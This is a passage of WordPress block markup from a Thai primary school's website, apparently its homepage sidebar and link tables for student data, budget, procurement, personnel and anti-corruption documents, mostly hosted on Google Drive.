data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a 